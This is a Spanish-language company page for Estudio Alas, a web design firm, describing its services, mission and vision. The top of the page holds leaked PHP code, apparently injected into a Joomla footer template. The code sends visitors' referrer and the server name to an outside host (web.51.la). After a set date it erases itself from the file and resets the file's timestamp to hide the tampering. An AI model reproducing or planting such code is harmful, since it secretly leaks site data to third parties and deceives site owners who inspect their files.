check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Empresa

estudio alas, diseño y desarrollo web

Estudio Alas es una empresa de Diseño y Desarrollo Web, Multimedia y Gráfico que utiliza tanto los recursos tradicionales como las nuevas tecnologías de la información para hacer posible la integración de su identidad corporativa en una estrategia global de comunicación.

Un esmerado servicio, atención personalizada y diseño innovador son las claves fundamentales de nuestro trabajo

Nos especializamos en las nuevas tecnologías a fin de crear un nuevo marketing: más humano, más cercano y sobre todo más ético y transparente.

Medimos el éxito por la satisfacción que generamos en nuestros clientes.

Cuidamos cada detalle en el momento de diseñar y programar cualquier tipo de proyecto web, basándonos en la última tecnologia y estándares de calidad del mercado internacional.

Consideramos la versatilidad, la flexibilidad, la transparencia y la amplitud del pensamiento como pilares para el desarrollo de soluciones creativas.

Estamos atentos a sus necesidades y procuramos brindarle soluciones efectivas con planes a su medida.

MISIÓN

Ayudar a cada cliente a crear y cuidar la relación que su empresa mantiene con sus clientes, empleados y socios.

Convertir el objetivo del cliente en nuestro objetivo. Identificarnos con sus necesidades y así, a través de una estrecha colaboración y comunicación mutua lograr los resultados esperados.

VISIÓN

Dar respuestas a cualquier necesidad de comunicación y diseño, mediante una moderna infraestructura y, sobre todo, un equipo humano muy profesional.